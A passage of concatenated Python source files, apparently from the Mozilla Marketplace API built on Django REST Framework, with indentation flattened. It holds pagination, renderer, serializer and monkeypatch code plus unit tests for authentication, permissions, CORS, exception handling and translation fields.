# start_index() is 1-based, and we want a 0-based offset, so we
# need to remove 1, unless it's already 0.
return index - 1
return index
def get_limit(self, page):
return page.paginator.per_page
class CustomPaginationSerializer(pagination.BasePaginationSerializer):
meta = MetaSerializer(source='*') # Takes the page object as the source
results_field = 'objects'
########NEW FILE########
__FILENAME__ = patch
from django.core.urlresolvers import reverse
from django.utils.functional import lazy
from rest_framework import relations, reverse as rest_reverse
def _reverse(viewname, args=None, kwargs=None, request=None, format=None,
**extra):
"""
Same as the rest framework reverse, except does not get the base URL.
"""
if format is not None:
kwargs = kwargs or {}
kwargs['format'] = format
return reverse(viewname, args=args, kwargs=kwargs, **extra)
_reverse.patched = 'patched'
# Monkeypatch this in.
def patch():
relations.reverse = _reverse
rest_reverse.reverse = _reverse
rest_reverse.reverse_lazy = lazy(_reverse, str)
########NEW FILE########
__FILENAME__ = renderers
import json
from django.http.multipartparser import parse_header
from rest_framework.negotiation import DefaultContentNegotiation
from rest_framework.renderers import JSONRenderer
class SuccinctJSONRenderer(JSONRenderer):
"""
JSONRenderer subclass that strips spaces from the output.
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
renderer_context = renderer_context or {}
indent = renderer_context.get('indent', None)
# Pass to the superclass if the Accept header is set with an explicit
# indent, if an indent level is manually passed, or if you're attempting
# to render `None`.
if accepted_media_type:
base_media_type, params = parse_header(
accepted_media_type.encode('ascii'))
indent = params.get('indent', indent)
if data is None or indent:
return super(SuccinctJSONRenderer, self).render(data,
accepted_media_type,
renderer_context)
return json.dumps(data, cls=self.encoder_class, indent=indent,
ensure_ascii=self.ensure_ascii, separators=(',', ':'))
class FirstAvailableRenderer(DefaultContentNegotiation):
"""
Content Negotiation class that ignores the Accept header when there is only
one renderer set on the view. Since most of our views only use the default
renderer list, which contains only SuccinctJSONRenderer, this means we
don't have to parse the Accept header for those.
Override content_negotiation_class in your class if you need something
different.
"""
def select_renderer(self, request, renderers, format_suffix=None):
if len(renderers) == 1:
return renderers[0], renderers[0].media_type
else:
return super(FirstAvailableRenderer, self).select_renderer(
request, renderers, format_suffix=format_suffix)
########NEW FILE########
__FILENAME__ = serializers
from django.conf import settings
import commonware.log
from rest_framework import serializers
from rest_framework.reverse import reverse
from tower import ugettext as _
log = commonware.log.getLogger('z.mkt.api.forms')
class PotatoCaptchaSerializer(serializers.Serializer):
"""
Serializer class to inherit from to get PotatoCaptcha (tm) protection for
an API based on DRF.
Clients using this API are supposed to have 2 fields in their HTML, "tuber"
and "sprout". They should never submit a value for "tuber", and they should
always submit "potato" as the value for "sprout". This is to prevent dumb
bots from spamming us.
If a wrong value is entered for "sprout" or "tuber" is present, a
ValidationError will be returned.
Note: this is completely disabled for authenticated users.
"""
# This field's value should always be blank (spammers are dumb).
tuber = serializers.CharField(required=False)
# This field's value should always be 'potato' (set by JS).
sprout = serializers.CharField()
def __init__(self, *args, **kwargs):
super(PotatoCaptchaSerializer, self).__init__(*args, **kwargs)
if hasattr(self, 'context') and 'request' in self.context:
self.request = self.context['request']
else:
raise serializers.ValidationError('Need request in context')
self.has_potato_recaptcha = True
if self.request.user.is_authenticated():
self.fields.pop('tuber')
self.fields.pop('sprout')
self.has_potato_recaptcha = False
def validate(self, attrs):
attrs = super(PotatoCaptchaSerializer, self).validate(attrs)
if self.has_potato_recaptcha:
sprout = attrs.get('sprout', None)
tuber = attrs.get('tuber', None)
if tuber or sprout != 'potato':
ip = self.request.META.get('REMOTE_ADDR', '')
log.info(u'Spammer thwarted: %s' % ip)
raise serializers.ValidationError(
_('Form could not be submitted.'))
# Don't keep the internal captcha fields, we don't want them to
# pollute self.data
self.fields.pop('tuber')
self.fields.pop('sprout')
return attrs
class CarrierSerializer(serializers.Serializer):
name = serializers.CharField()
slug = serializers.CharField()
id = serializers.IntegerField()
class RegionSerializer(CarrierSerializer):
default_currency = serializers.CharField()
default_language = serializers.CharField()
class URLSerializerMixin(serializers.ModelSerializer):
"""
ModelSerializer mixin that adds a field named `url` to the object with that
resource's URL. DRF will automatically populate the `Location` header from
this field when appropriate.
You may define that url in one of two ways:
1) By defining a `url_basename` property on the Meta class. The URL will
then be determined by reversing `<url_basename>-detail`, with the `pk`
passed as a keyword argument.
2) By overriding the get_url method.
"""
url = serializers.SerializerMethodField('get_url')
def get_url(self, obj):
if 'request' in self.context and hasattr(self.Meta, 'url_basename'):
request = self.context['request']
namespace = ''
if request.API_VERSION != settings.API_CURRENT_VERSION:
namespace = 'api-v%d:' % request.API_VERSION
return reverse('%s%s-detail' % (namespace, self.Meta.url_basename,),
request=request, kwargs={'pk': obj.pk})
return None
########NEW FILE########
__FILENAME__ = test_authentication
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from mock import Mock, patch
from multidb.pinning import this_thread_is_pinned, unpin_this_thread
from nose.tools import eq_, ok_
from rest_framework.request import Request
from access.models import Group, GroupUser
from amo.helpers import absolutify
from amo.tests import TestCase
from test_utils import RequestFactory
from users.models import UserProfile
from mkt.api import authentication
from mkt.api.middleware import RestOAuthMiddleware, RestSharedSecretMiddleware
from mkt.api.models import Access, generate
from mkt.api.tests.test_oauth import OAuthClient
from mkt.site.fixtures import fixture
from mkt.site.middleware import RedirectPrefixedURIMiddleware
class TestRestOAuthAuthentication(TestCase):
fixtures = fixture('user_2519', 'group_admin', 'group_editor')
def setUp(self):
self.api_name = 'foo'
self.profile = UserProfile.objects.get(pk=2519)
self.profile.update(read_dev_agreement=datetime.today())
self.access = Access.objects.create(key='test_oauth_key',
secret=generate(),
user=self.profile)
self.auth = authentication.RestOAuthAuthentication()
self.middlewares = [RedirectPrefixedURIMiddleware, RestOAuthMiddleware]
unpin_this_thread()
def call(self, client=None):
client = client or OAuthClient(self.access)
# Make a fake POST somewhere. We use POST in order to properly test db
# pinning after auth.
url = absolutify('/api/whatever')
req = RequestFactory().post(url,
HTTP_HOST='testserver',
HTTP_AUTHORIZATION=client.sign('POST', url)[1]['Authorization'])
for m in self.middlewares:
m().process_request(req)
return req
def add_group_user(self, user, *names):
for name in names:
group = Group.objects.get(name=name)
GroupUser.objects.create(user=self.profile, group=group)
def test_accepted(self):
req = Request(self.call())
eq_(self.auth.authenticate(req), (self.profile, None))
def test_request_token_fake(self):
c = Mock()
c.key = self.access.key
c.secret = 'mom'
ok_(not self.auth.authenticate(
Request(self.call(client=OAuthClient(c)))))
ok_(not this_thread_is_pinned())
def test_request_admin(self):
self.add_group_user(self.profile, 'Admins')
ok_(not self.auth.authenticate(Request(self.call())))
def test_request_has_role(self):
self.add_group_user(self.profile, 'App Reviewers')
ok_(self.auth.authenticate(Request(self.call())))
class TestRestAnonymousAuthentication(TestCase):
def setUp(self):
self.auth = authentication.RestAnonymousAuthentication()
self.request = RequestFactory().post('/api/whatever')
unpin_this_thread()
def test_auth(self):
user, token = self.auth.authenticate(self.request)
ok_(isinstance(user, AnonymousUser))
eq_(token, None)
ok_(not this_thread_is_pinned())
@patch.object(settings, 'SECRET_KEY', 'gubbish')
class TestSharedSecretAuthentication(TestCase):
fixtures = fixture('user_2519')
def setUp(self):
self.auth = authentication.RestSharedSecretAuthentication()
self.profile = UserProfile.objects.get(pk=2519)
self.profile.update(email=self.profile.email)
self.middlewares = [RedirectPrefixedURIMiddleware,
RestSharedSecretMiddleware]
unpin_this_thread()
def test_session_auth_query(self):
req = RequestFactory().post(
'/api/[email protected],56b6f1a3dd735d962c56ce7d8f46e02ec1d4748d'
'2c00c407d75f0969d08bb9c68c31b3371aa8130317815c89e5072e31bb94b4121'
'c5c165f3515838d4d6c60c4,165d631d3c3045458b4516242dad7ae')
for m in self.middlewares:
m().process_request(req)
ok_(self.auth.authenticate(Request(req)))
eq_(self.profile.pk, req.amo_user.pk)
def test_failed_session_auth_query(self):
req = RequestFactory().post('/api/?_user=bogus')
for m in self.middlewares:
m().process_request(req)
ok_(not self.auth.authenticate(Request(req)))
assert not getattr(req, 'amo_user', None)
def test_session_auth(self):
req = RequestFactory().post(
'/api/',
HTTP_AUTHORIZATION='mkt-shared-secret '
'[email protected],56b6f1a3dd735d962c56'
'ce7d8f46e02ec1d4748d2c00c407d75f0969d08bb'
'9c68c31b3371aa8130317815c89e5072e31bb94b4'
'121c5c165f3515838d4d6c60c4,165d631d3c3045'
'458b4516242dad7ae')
for m in self.middlewares:
m().process_request(req)
ok_(self.auth.authenticate(Request(req)))
eq_(self.profile.pk, req.amo_user.pk)
def test_failed_session_auth(self):
req = RequestFactory().post(
'/api/',
HTTP_AUTHORIZATION='mkt-shared-secret bogus')
for m in self.middlewares:
m().process_request(req)
ok_(not self.auth.authenticate(Request(req)))
assert not getattr(req, 'amo_user', None)
def test_session_auth_no_post(self):
req = RequestFactory().post('/api/')
for m in self.middlewares:
m().process_request(req)
req.user = self.profile
assert not self.auth.authenticate(Request(req))
@patch.object(settings, 'SECRET_KEY', 'gubbish')
class TestMultipleAuthenticationDRF(TestCase):
fixtures = fixture('user_2519')
def setUp(self):
self.profile = UserProfile.objects.get(pk=2519)
def test_multiple_shared_works(self):
request = RequestFactory().post(
'/api',
HTTP_AUTHORIZATION='mkt-shared-secret '
'[email protected],56b6f1a3dd735d962c56'
'ce7d8f46e02ec1d4748d2c00c407d75f0969d08bb'
'9c68c31b3371aa8130317815c89e5072e31bb94b4'
'121c5c165f3515838d4d6c60c4,165d631d3c3045'
'458b4516242dad7ae')
drf_request = Request(request)
# Start with an AnonymousUser on the request, because that's a classic
# situation: we already went through a middleware, it didn't find a
# session cookie, if set request.user = AnonymousUser(), and now we
# are going through the authentication code in the API.
request.user = AnonymousUser()
# Call middleware as they would normally be called.
RedirectPrefixedURIMiddleware().process_request(request)
RestSharedSecretMiddleware().process_request(request)
RestOAuthMiddleware().process_request(request)
drf_request.authenticators = (
authentication.RestSharedSecretAuthentication(),
authentication.RestOAuthAuthentication())
eq_(drf_request.user, self.profile)
eq_(drf_request._request.user, self.profile)
eq_(drf_request.user.is_authenticated(), True)
eq_(drf_request._request.user.is_authenticated(), True)
eq_(drf_request.amo_user.pk, self.profile.pk)
eq_(drf_request._request.amo_user.pk, self.profile.pk)
def test_multiple_fail(self):
request = RequestFactory().post('/api')
drf_request = Request(request)
request.user = AnonymousUser()
drf_request.authenticators = (
authentication.RestSharedSecretAuthentication(),
authentication.RestOAuthAuthentication())
eq_(drf_request.user.is_authenticated(), False)
eq_(drf_request._request.user.is_authenticated(), False)
########NEW FILE########
__FILENAME__ = test_authorization
from django.contrib.auth.models import AnonymousUser
from rest_framework.permissions import AllowAny, BasePermission
from mock import Mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
from amo.tests import TestCase
from users.models import UserProfile
from mkt.api.authorization import (AllowAuthor, AllowAppOwner, AllowNone,
AllowOwner, AllowRelatedAppOwner,
AllowReadOnlyIfPublic, AllowSelf, AnyOf,
ByHttpMethod, flag, GroupPermission, switch)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class TestWaffle(TestCase):
def setUp(self):
super(TestWaffle, self).setUp()
self.request = RequestFactory().get('/')
def test_waffle_flag(self):
self.create_flag('foo')
ok_(flag('foo')().has_permission(self.request, ''))
def test_not_waffle_flag(self):
ok_(not flag('foo')().has_permission(self.request, ''))
def test_waffle_switch(self):
self.create_switch('foo')
ok_(switch('foo')().has_permission(self.request, ''))
def test_not_switch_flag(self):
ok_(not switch('foo')().has_permission(self.request, ''))
class TestAllowSelfAuthorization(TestCase):
fixtures = fixture('user_2519', 'user_999')
def setUp(self):
self.permission = AllowSelf()
self.anonymous = AnonymousUser()
self.user = UserProfile.objects.get(pk=2519)
self.request = RequestFactory().get('/')
self.request.user = self.anonymous
self.request.amo_user = None
def test_has_permission_anonymous(self):
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_permission_user(self):
self.request.amo_user = self.request.user = self.user
eq_(self.permission.has_permission(self.request, 'myview'), True)
def test_has_object_permission_anonymous(self):
eq_(self.permission.has_object_permission(
self.request, 'myview', self.user), False)
def test_has_object_permission_user(self):
self.request.amo_user = self.request.user = self.user
obj = self.user
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
True)
def test_has_object_permission_different_user(self):
self.request.user = UserProfile.objects.get(pk=999)
self.request.amo_user = self.request.user
obj = self.user
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
class TestAllowOwner(TestCase):
fixtures = fixture('user_2519', 'user_999')
def setUp(self):
self.permission = AllowOwner()
self.anonymous = AnonymousUser()
self.user = UserProfile.objects.get(pk=2519)
self.request = RequestFactory().get('/')
self.request.user = self.anonymous
self.request.amo_user = None
def test_has_permission_anonymous(self):
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_permission_user(self):
self.request.user = self.user
self.request.amo_user = self.request.user
eq_(self.permission.has_permission(self.request, 'myview'), True)
def test_has_object_permission_user(self):
self.request.user = self.user
self.request.amo_user = self.request.user
obj = Mock()
obj.user = self.user
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
True)
def test_has_object_permission_different_user(self):
self.request.user = UserProfile.objects.get(pk=999)
self.request.amo_user = self.request.user
obj = Mock()
obj.pk = self.user.pk
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
class PartialFailPermission(BasePermission):
def has_object_permission(self, request, view, obj):
return False
class FailPartialPermission(BasePermission):
def has_permission(self, request, view):
return False
class TestAnyOf(TestCase):
def test_has_permission(self):
request = RequestFactory().get('/')
ok_(AnyOf(AllowNone, AllowAny)().has_permission(
request, 'myview'))
ok_(AnyOf(AllowAny, AllowNone)().has_permission(
request, 'myview'))
def test_has_permission_fail(self):
request = RequestFactory().get('/')
ok_(not AnyOf(AllowNone, AllowNone)().has_permission(
request, 'myview'))
def test_has_object_permission(self):
request = RequestFactory().get('/')
ok_(AnyOf(AllowNone, AllowAny
)().has_object_permission(request, 'myview', None))
ok_(AnyOf(AllowAny, AllowNone
)().has_object_permission(request, 'myview', None))
def test_has_object_permission_fail(self):
request = RequestFactory().get('/')
ok_(not AnyOf(AllowNone, AllowNone
)().has_object_permission(request, 'myview', None))
def test_has_object_permission_partial_fail(self):
request = RequestFactory().get('/')
ok_(not AnyOf(FailPartialPermission, PartialFailPermission
)().has_object_permission(request, 'myview', None))
class TestAllowNone(TestCase):
def setUp(self):
self.permission = AllowNone()
self.anonymous = AnonymousUser()
self.user = UserProfile()
self.request = RequestFactory().get('/')
self.request.user = self.anonymous
self.request.amo_user = None
def test_has_permission_anonymous(self):
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_permission_user(self):
self.request.user = Mock()
self.request_amo_user = Mock()
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_object_permission_anonymous(self):
obj = Mock()
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
def test_has_object_permission_user(self):
self.request.user = Mock()
self.request_amo_user = Mock()
obj = Mock()
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
class TestAllowAppOwner(TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.permission = AllowAppOwner()
self.anonymous = AnonymousUser()
self.owner = self.app.authors.all()[0]
self.request = RequestFactory().get('/')
self.request.user = self.anonymous
self.request.amo_user = None
def test_has_permission_anonymous(self):
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_permission_user(self):
self.request.user = self.owner
self.request.amo_user = self.owner
eq_(self.permission.has_permission(self.request, 'myview'), True)
def test_has_object_permission_user(self):
self.request.user = self.owner
self.request.amo_user = self.owner
obj = self.app
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
True)
def test_has_object_permission_different_user(self):
self.request.user = UserProfile.objects.get(pk=2519)
self.request.amo_user = self.request.user
obj = self.app
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
def test_has_object_permission_anonymous(self):
obj = self.app
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
class TestAllowRelatedAppOwner(TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.permission = AllowRelatedAppOwner()
self.anonymous = AnonymousUser()
self.owner = self.app.authors.all()[0]
self.request = RequestFactory().get('/')
self.request.user = self.anonymous
self.request.amo_user = None
def test_has_permission_anonymous(self):
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_permission_user(self):
self.request.user = self.owner
self.request.amo_user = self.owner
eq_(self.permission.has_permission(self.request, 'myview'), True)
def test_has_object_permission_user(self):
self.request.user = self.owner
self.request.amo_user = self.owner
obj = Mock()
obj.addon = self.app
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
True)
def test_has_object_permission_different_user(self):
self.request.user = UserProfile.objects.get(pk=2519)
self.request.amo_user = self.request.user
obj = Mock()
obj.addon = self.app
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
class TestAllowAuthor(TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.permission = AllowAuthor()
app = Webapp.objects.get(pk=337141)
self.authors = app.authors.all()
self.view = Mock()
self.view.get_authors.return_value = self.authors
def create_request(self, user_profile):
request = RequestFactory().get('/')
request.amo_user = user_profile
return request
def test_has_permission_anonymous(self):
request = self.create_request(user_profile=None)
eq_(self.permission.has_permission(request, self.view), False)
def test_has_permission_user(self):
request = self.create_request(user_profile=self.authors[0])
eq_(self.permission.has_permission(request, self.view), True)
def test_has_permission_different_user(self):
other_user_profile = UserProfile.objects.get(pk=2519)
request = self.create_request(user_profile=other_user_profile)
eq_(self.permission.has_permission(request, self.view), False)
class TestAllowReadOnlyIfPublic(TestCase):
def setUp(self):
self.permission = AllowReadOnlyIfPublic()
self.anonymous = AnonymousUser()
self.request_factory = RequestFactory()
# 'patch' is missing because it's absent from RequestFactory in
# django < 1.5. Usually we don't special case 'put' vs 'patch' in
# permissions code though, so it's fine.
self.unsafe_methods = ('post', 'put', 'delete')
self.safe_methods = ('get', 'options', 'head')
def _request(self, verb):
request = getattr(self.request_factory, verb)('/')
request.user = self.anonymous
request.amo_user = None
return request
def test_has_permission(self):
for verb in self.safe_methods:
eq_(self.permission.has_permission(self._request(verb), 'myview'),
True)
for verb in self.unsafe_methods:
eq_(self.permission.has_permission(self._request(verb), 'myview'),
False)
def test_has_object_permission_public(self):
obj = Mock()
obj.is_public.return_value = True
for verb in self.safe_methods:
eq_(self.permission.has_object_permission(self._request(verb),
'myview', obj), True)
for verb in self.unsafe_methods:
eq_(self.permission.has_object_permission(self._request(verb),
'myview', obj), False)
def test_has_object_permission_not_public(self):
obj = Mock()
obj.is_public.return_value = False
for verb in (self.unsafe_methods + self.safe_methods):
eq_(self.permission.has_object_permission(self._request(verb),
'myview', obj), False)
class TestGroupPermission(TestCase):
fixtures = fixture('user_2519')
def setUp(self):
self.permission = GroupPermission('Drinkers', 'Beer')
self.obj = Mock()
self.profile = UserProfile.objects.get(pk=2519)
self.anonymous = AnonymousUser()
self.request = RequestFactory().get('/')
self.request.user = self.anonymous
def test_has_permission_user_without(self):
self.request.user = self.profile
self.request.amo_user = self.profile
self.request.groups = self.profile.groups.all()
self.grant_permission(self.profile, 'Drinkers:Scotch')
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_permission_user_with(self):
self.request.user = self.profile
self.request.amo_user = self.profile
self.request.groups = self.profile.groups.all()
self.grant_permission(self.profile, 'Drinkers:Beer')
eq_(self.permission.has_permission(self.request, 'myview'), True)
def test_has_permission_anonymous(self):
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_has_object_permission_user_without(self):
self.request.user = self.profile
self.request.amo_user = self.profile
self.request.groups = self.profile.groups.all()
self.grant_permission(self.profile, 'Drinkers:Scotch')
obj = Mock()
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
def test_has_object_permission_user_with(self):
self.request.user = self.profile
self.request.amo_user = self.profile
self.request.groups = self.profile.groups.all()
self.grant_permission(self.profile, 'Drinkers:Beer')
obj = Mock()
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
True)
def test_has_object_permission_anonymous(self):
obj = Mock()
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
class TestByHttpMethodPermission(TestCase):
def setUp(self):
self.get_permission = Mock
self.patch_permission = Mock
self.post_permission = Mock
self.put_permission = Mock
self.permission = ByHttpMethod({
'get': self.get_permission,
})
self.set_permission_mock('get', True)
def set_permission_mock(self, method, value):
mock = self.permission.method_permissions[method]
mock.has_permission.return_value = value
def set_object_permission_mock(self, method, value):
mock = self.permission.method_permissions[method]
mock.has_object_permission.return_value = value
def test_get(self):
self.request = RequestFactory().get('/')
eq_(self.permission.has_permission(self.request, 'myview'), True)
self.set_permission_mock('get', False)
eq_(self.permission.has_permission(self.request, 'myview'), False)
def test_get_obj(self):
obj = Mock()
self.request = RequestFactory().get('/')
self.set_object_permission_mock('get', True)
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
True)
self.set_object_permission_mock('get', False)
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
def test_missing_method(self):
self.request = RequestFactory().post('/')
eq_(self.permission.has_permission(self.request, 'myview'), False)
obj = Mock()
self.request = RequestFactory().post('/')
eq_(self.permission.has_object_permission(self.request, 'myview', obj),
False)
self.request = RequestFactory().options('/')
eq_(self.permission.has_permission(self.request, 'myview'), False)
########NEW FILE########
__FILENAME__ = test_base
import urllib
from django import forms
from django.core.urlresolvers import reverse
from mock import patch
from nose.tools import eq_
from rest_framework.decorators import (authentication_classes,
permission_classes)
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from test_utils import RequestFactory
from amo.tests import TestCase
from mkt.api.base import cors_api_view, SubRouterWithFormat
from mkt.api.tests.test_oauth import RestOAuth
from mkt.webapps.views import AppViewSet
class URLRequestFactory(RequestFactory):
def _encode_data(self, data, content_type):
return urllib.urlencode(data)
class TestEncoding(RestOAuth):
def test_blah_encoded(self):
"""
Regression test of bug #858403: ensure that a 415 (and not 500) is
raised when an unsupported Content-Type header is passed to an API
endpoint.
"""
r = self.client.post(reverse('app-list'),
CONTENT_TYPE='application/blah',
data='cvan was here')
eq_(r.status_code, 415)
def test_bad_json(self):
r = self.client.post(reverse('app-list'),
CONTENT_TYPE='application/json',
data="not ' json ' 5")
eq_(r.status_code, 400)
def test_not_json(self):
r = self.client.get(reverse('app-list'),
HTTP_ACCEPT='application/blah')
# We should return a 406, but for endpoints that only accept JSON, we
# cheat and return json content without even looking at the Accept
# header (see mkt.api.renderers and settings).
eq_(r.status_code, 200)
eq_(r['content-type'], 'application/json')
@patch.object(AppViewSet, 'create')
def test_form_encoded(self, create_mock):
create_mock.return_value = Response()
self.client.post(reverse('app-list'),
data='foo=bar',
content_type='application/x-www-form-urlencoded')
eq_(create_mock.call_args[0][0].DATA['foo'], 'bar')
class TestCORSWrapper(TestCase):
def test_cors(self):
@cors_api_view(['GET', 'PATCH'])
@authentication_classes([])
@permission_classes([])
def foo(request):
return Response()
request = RequestFactory().get('/')
foo(request)
eq_(request.CORS, ['GET', 'PATCH'])
class Form(forms.Form):
app = forms.ChoiceField(choices=(('valid', 'valid'),))
class TestSubRouterWithFormat(TestCase):
def test_format_is_included(self):
router = SubRouterWithFormat()
router.register('foo', ModelViewSet, base_name='bar')
expected = [
{'name': 'bar-list', 'pattern': '^(?P<pk>[^/]+)/foo/$' },
{'name': 'bar-detail', 'pattern': '^(?P<pk>[^/]+)/foo/$' },
{'name': 'bar-list',
'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$' },
{'name': 'bar-detail',
'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$'},
]
actual = [{
'name': url.name, 'pattern': url.regex.pattern
} for url in router.urls]
for i, _ in enumerate(expected):
eq_(actual[i], expected[i])
def test_format_is_included_no_trailing_slashes(self):
router = SubRouterWithFormat(trailing_slash=False)
router.register('foo', ModelViewSet, base_name='bar')
expected = [
{'name': 'bar-list', 'pattern': '^(?P<pk>[^/.]+)/foo$' },
{'name': 'bar-detail', 'pattern': '^(?P<pk>[^/.]+)/foo$' },
{'name': 'bar-list',
'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$' },
{'name': 'bar-detail',
'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$'},
]
actual = [{
'name': url.name, 'pattern': url.regex.pattern
} for url in router.urls]
for i, _ in enumerate(expected):
eq_(actual[i], expected[i])
########NEW FILE########
__FILENAME__ = test_exceptions
from mkt.api.exceptions import custom_exception_handler
from nose.tools import raises
from rest_framework.response import Response
from test_utils import TestCase
class TestExceptionHandler(TestCase):
def test_response(self):
try:
1/0
except Exception as exc:
assert isinstance(custom_exception_handler(exc), Response)
@raises(ZeroDivisionError)
def test_raised(self):
with self.settings(DEBUG_PROPAGATE_EXCEPTIONS=True):
try:
1/0
except Exception as exc:
custom_exception_handler(exc)
########NEW FILE########
__FILENAME__ = test_fields
# -*- coding: utf-8 -*-
from mock import Mock
from nose.tools import eq_, ok_
from rest_framework.request import Request
from rest_framework.serializers import CharField, Serializer
from rest_framework.test import APIRequestFactory
from test_utils import RequestFactory
import amo
from amo.tests import TestCase
from addons.models import AddonCategory, Category
from mkt.api.fields import (ESTranslationSerializerField,
SlugOrPrimaryKeyRelatedField, SplitField,
TranslationSerializerField)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from versions.models import Version
from translations.models import Translation
class _TestTranslationSerializerField(object):
field_class = TranslationSerializerField
def setUp(self):
super(_TestTranslationSerializerField, self).setUp()
self.factory = APIRequestFactory()
self.app = Webapp.objects.get(pk=337141)
def _test_expected_dict(self, field):
result = field.field_to_native(self.app, 'name')
expected = {
'en-US': unicode(Translation.objects.get(id=self.app.name.id,
locale='en-US')),
'es': unicode(Translation.objects.get(id=self.app.name.id,
locale='es')),
}
eq_(result, expected)
result = field.field_to_native(self.app, 'description')
expected = {
'en-US': Translation.objects.get(id=self.app.description.id,
locale='en-US'),
}
eq_(result, expected)
def _test_expected_single_string(self, field):
result = field.field_to_native(self.app, 'name')
expected = unicode(self.app.name)
eq_(result, expected)
result = field.field_to_native(self.app, 'description')
expected = unicode(self.app.description)
eq_(result, expected)
def test_from_native(self):
data = u'Translatiön'
field = self.field_class()
result = field.from_native(data)
eq_(result, data)
data = {
'fr': u'Non mais Allô quoi !',
'en-US': u'No But Hello what!'
}
field = self.field_class()
result = field.from_native(data)
eq_(result, data)
data = ['Bad Data']
field = self.field_class()
result = field.from_native(data)
eq_(result, unicode(data))
def test_field_from_native_strip(self):
data = {
'fr': u' Non mais Allô quoi ! ',
'en-US': u''
}
field = self.field_class()
result = field.from_native(data)
eq_(result, {'fr': u'Non mais Allô quoi !', 'en-US': u''})
def test_field_to_native(self):
field = self.field_class()
self._test_expected_dict(field)
def test_field_to_native_source(self):
self.app.mymock = Mock()
self.app.mymock.mymocked_field = self.app.name
field = self.field_class(source='mymock.mymocked_field')
result = field.field_to_native(self.app, 'shouldbeignored')
expected = {
'en-US': unicode(Translation.objects.get(id=self.app.name.id,
locale='en-US')),
'es': unicode(Translation.objects.get(id=self.app.name.id,
locale='es')),
}
eq_(result, expected)
def test_field_to_native_empty_context(self):
mock_serializer = Serializer()
mock_serializer.context = {}
field = self.field_class()
field.initialize(mock_serializer, 'name')
self._test_expected_dict(field)
def test_field_to_native_request_POST(self):
request = Request(self.factory.post('/'))
mock_serializer = Serializer()
mock_serializer.context = {'request': request}
field = self.field_class()
field.initialize(mock_serializer, 'name')
self._test_expected_dict(field)
def test_field_to_native_request_GET(self):
request = Request(self.factory.get('/'))
mock_serializer = Serializer()
mock_serializer.context = {'request': request}
field = self.field_class()
field.initialize(mock_serializer, 'name')
self._test_expected_dict(field)
def test_field_to_native_request_GET_lang(self):
"""
Pass a lang in the query string, expect to have a single string
returned instead of an object.
"""
# Note that we don't go through the middlewares etc so the actual
# language for the process isn't changed, we don't care as
# _expect_single_string() method simply tests with the current language,
# whatever it is.
request = Request(self.factory.get('/', {'lang': 'lol'}))
eq_(request.GET['lang'], 'lol')
mock_serializer = Serializer()
mock_serializer.context = {'request': request}
field = self.field_class()
field.initialize(mock_serializer, 'name')
self._test_expected_single_string(field)
def test_field_null(self):
field = self.field_class()
self.app = Webapp()
result = field.field_to_native(self.app, 'name')
eq_(result, None)
result = field.field_to_native(self.app, 'description')
eq_(result, None)
class TestTranslationSerializerField(_TestTranslationSerializerField, TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
class TestESTranslationSerializerField(_TestTranslationSerializerField, TestCase):
field_class = ESTranslationSerializerField
def setUp(self):
self.factory = APIRequestFactory()
self.app = Webapp()
self.app.default_locale = 'en-US'
self.app.name_translations = {
'en-US': u'English Name',
'es': u'Spànish Name'
}
self.app.description_translations = {
'en-US': u'English Description',
'fr': u'Frençh Description'
}
def test_attach_translations(self):
data = {
'foo_translations' : [{
'lang': 'testlang',
'string': 'teststring'
}, {
'lang': 'testlang2',
'string': 'teststring2'
}]
}
self.app = Webapp()
self.field_class().attach_translations(self.app, data, 'foo')
eq_(self.app.foo_translations, {'testlang': 'teststring',
'testlang2': 'teststring2'})
def test_attach_translations_target_name(self):
data = {
'foo_translations' : [{
'lang': 'testlang',
'string': 'teststring'
}, {
'lang': 'testlang2',
'string': 'teststring2'
}]
}
self.app = Webapp()
self.field_class().attach_translations(self.app, data, 'foo',
target_name='bar')
eq_(self.app.bar_translations, {'testlang': 'teststring',
'testlang2': 'teststring2'})
def test_attach_translations_missing_key(self):
data = {
'foo_translations': None
}
self.app = Webapp()
self.field_class().attach_translations(self.app, data, 'foo')
eq_(self.app.foo_translations, {})
def _test_expected_dict(self, field):
result = field.field_to_native(self.app, 'name')
expected = self.app.name_translations
eq_(result, expected)
